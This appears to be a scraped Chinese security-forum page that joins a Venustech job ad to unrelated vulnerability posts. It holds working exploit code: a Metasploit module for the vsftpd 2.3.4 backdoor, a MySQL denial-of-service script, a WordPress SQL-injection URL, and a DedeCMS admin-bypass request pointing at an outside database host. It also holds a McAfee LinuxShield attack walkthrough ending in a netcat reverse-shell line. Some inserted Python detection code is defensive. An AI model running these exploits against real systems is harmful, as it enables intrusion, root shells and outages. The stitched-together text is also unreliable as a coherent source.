
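[Recruitment] [Hiring] Venustech R&D recruitment

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Security assistant: Recruit or job-hunt through the 非安全中国 administrators, QQ group: 57116771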


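  • ++++++++++ About Venustech ++++++++++

    Just send me a private message on the site.

    I. R&D Center: Linux C Software Engineer (several positions)

    Responsibilities:

    1. Development and maintenance of software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled with the Linux operating system; proficient in C programming on Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with routers, switches, firewalls and other security devices
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several positions)

    Responsibilities:

    1. System testing and integration testing of products
    2. Writing, executing and revising product test cases
    3. Product performance testing
    4. Support and testing for external projects

    Requirements:

    1. Basic knowledge of TCP/IP
    2. Solid data-communications fundamentals
    3. Some grounding in Linux
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test-case design, system testing and stress testing
    7. Familiar with firewall principles, with some understanding of firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet-analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several positions)

    Responsibilities:

    1. Delivering Trojan detection services and web vulnerability scanning services
    2. Technical support for service customers
    3. Research on web-page Trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and the like
    4. Routine updating and maintenance of the security event libraries for products such as IDS/IPS/UTM/TDS/WAG/322
    5. Research on attack techniques of all kinds; research on the TCP/IP protocols; research on reverse engineering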

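    非安全中国网 disclaimer:
    1. All statements and images in this post are solely the poster's personal opinion and do not represent this site's position.
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer Statement" and holds the associated rights.
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post.
    4. Parts of this post are reposted from other media and published on this site in order to pass on more information; this does not mean that the site endorses the views expressed or vouches for their accuracy.
    5. If this post infringes your site's or your personal copyright, please notify this site immediately; the site will remove it promptly and offers its sincere apologies.
    6. The site's administrators and moderators may delete this post without notifying the poster in advance.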

    VSFTPD v2.3.4 Backdoor command execution vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5'],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

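A defender-side check for the two observable behaviours of the module above (a `USER` name carrying `:)` and a follow-up connection to port 6200), as an added example that is not part of the original post or of Metasploit. The log line format, the 30-second correlation window and the sample records are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sensor records (not from the page). Assumed line format:
#   <ISO time> <client ip:port> <server ip:port> <FTP|TCP> <detail>
SAMPLE_LOG = """\
2011-07-04T10:00:01 10.0.0.5:40112 10.0.0.20:21 FTP USER anonymous
2011-07-04T10:00:05 10.0.0.9:51540 10.0.0.20:6200 TCP SYN
2011-07-04T10:00:07 10.0.0.9:51544 10.0.0.20:21 FTP USER x7Qa:)
2011-07-04T10:00:08 10.0.0.9:51544 10.0.0.20:21 FTP PASS k2
2011-07-04T10:00:08 10.0.0.9:51560 10.0.0.20:6200 TCP SYN
2011-07-04T10:07:00 10.0.0.7:40000 10.0.0.21:6200 TCP SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):\d+ (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"(?P<proto>FTP|TCP) (?P<detail>.*)$"
)
USER_RE = re.compile(r"^USER\s+(?P<name>.*)$", re.IGNORECASE)

BACKDOOR_PORT = 6200            # bind-shell port the module connects to
TRIGGER = ":)"                  # sequence the module appends to the USER name
WINDOW = timedelta(seconds=30)  # assumed correlation window


def parse(log_text):
    """Turn log text into event dicts, skipping lines that do not match."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%S")
        ev["dport"] = int(ev["dport"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect(log_text):
    """Return (kind, client, server) findings in time order.

    trigger       - FTP USER name containing ":)"
    shell_connect - port 6200 connection from the same client to the same
                    server within WINDOW after a trigger
    port_probe    - any other connection to port 6200 (the module also
                    tries the port before sending the trigger)
    """
    triggers = []
    findings = []
    for ev in parse(log_text):
        if ev["proto"] == "FTP":
            m = USER_RE.match(ev["detail"])
            if m and TRIGGER in m.group("name"):
                triggers.append(ev)
                findings.append(("trigger", ev["src"], ev["dst"]))
        elif ev["dport"] == BACKDOOR_PORT:
            linked = any(
                t["src"] == ev["src"] and t["dst"] == ev["dst"]
                and timedelta(0) <= ev["ts"] - t["ts"] <= WINDOW
                for t in triggers
            )
            kind = "shell_connect" if linked else "port_probe"
            findings.append((kind, ev["src"], ev["dst"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

A `shell_connect` finding means the FTP server accepted a connection on 6200 right after the trigger, which is the case to treat as a compromised host rather than a scan.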

    WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 remote denial-of-service vulnerability

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()

    Step-by-step Linux installation: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCMS (织梦) v5.6-5.7 unauthorized access vulnerability

    http://www.XXXX.com/[dedecms_admin_dir]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA code and the request goes straight into the site's admin backend.

    This vulnerability can only be used if the admin backend path is known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
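Why the replacement filter above closes the hole that the original loop leaves open, modelled in Python as an added example (this is not DedeCMS code). `parse_php_query` is a simplified stand-in for PHP's bracket-key request parsing, and the sample requests and the host `db.example.test` are constructed.

```python
import re
from urllib.parse import parse_qsl

# Same pattern as the PHP on the page: '#^(cfg_|GLOBALS)#'
BLOCKED = re.compile(r"^(cfg_|GLOBALS)")


def parse_php_query(query):
    """Simplified model of PHP's bracket syntax:
    a[b][c]=v becomes {'a': {'b': {'c': 'v'}}}."""
    request = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        head, _, rest = raw_key.partition("[")
        path = [head] + re.findall(r"\[([^\]]*)\]", "[" + rest) if rest else [head]
        node = request
        for part in path[:-1]:
            child = node.get(part)
            if not isinstance(child, dict):
                child = node[part] = {}
            node = child
        node[path[-1]] = value
    return request


def old_filter_allows(request):
    """Original loop: looks only at the top-level keys of $_REQUEST."""
    return not any(k and BLOCKED.match(k) for k in request)


def new_filter_allows(value):
    """CheckRequest(): recurses into arrays and tests every key and every
    scalar value against the same pattern."""
    if isinstance(value, dict):
        return all(new_filter_allows(k) and new_filter_allows(v)
                   for k, v in value.items())
    return not (value and BLOCKED.match(value))


def compare(query):
    """Return (allowed by old filter, allowed by new filter)."""
    request = parse_php_query(query)
    return old_filter_allows(request), new_filter_allows(request)


# Constructed requests covering the four interesting shapes.
CASES = {
    # Top-level key is "_POST", so the old loop never sees "GLOBALS".
    "nested": "dopost=login&_POST[GLOBALS][cfg_dbhost]=db.example.test",
    # Both filters catch a blocked name used directly as a parameter.
    "direct": "cfg_dbhost=db.example.test",
    # Ordinary login parameters pass both.
    "benign": "dopost=login&userid=admin",
    # Side effect of the fix: values are matched too, so a harmless value
    # that merely starts with "cfg_" is now rejected as well.
    "value": "keyword=cfg_basehost",
}

if __name__ == "__main__":
    for name, query in CASES.items():
        print(name, compare(query))
```

The `nested` case is the request shape from the post; the `value` case is worth testing against forms on the site, since the fix rejects it too.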

    Step-by-step Linux installation: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

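    Multiple security vulnerabilities in the Django development framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django contains multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache-poisoning attacks or cause a denial of service.
    1) When a cache backend is used, an error in how django.contrib.sessions handles sessions can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, that checks whether a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify the supplied URL and resolve it. By default the underlying socket has no timeout, so an attacker can send a crafted URL that consumes all server memory, causing a denial of service.
    3) An error in the handling of redirect responses when validating URLs supplied to the "URLField" field type lets an attacker return a redirect response pointing to a "file://" URL and so determine whether local files exist on the server.
    4) An error in the handling of the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses lets an attacker carry out cache-poisoning attacks.

    Details:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/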

    McAfee LinuxShield local/remote code execution vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.primary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pass nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory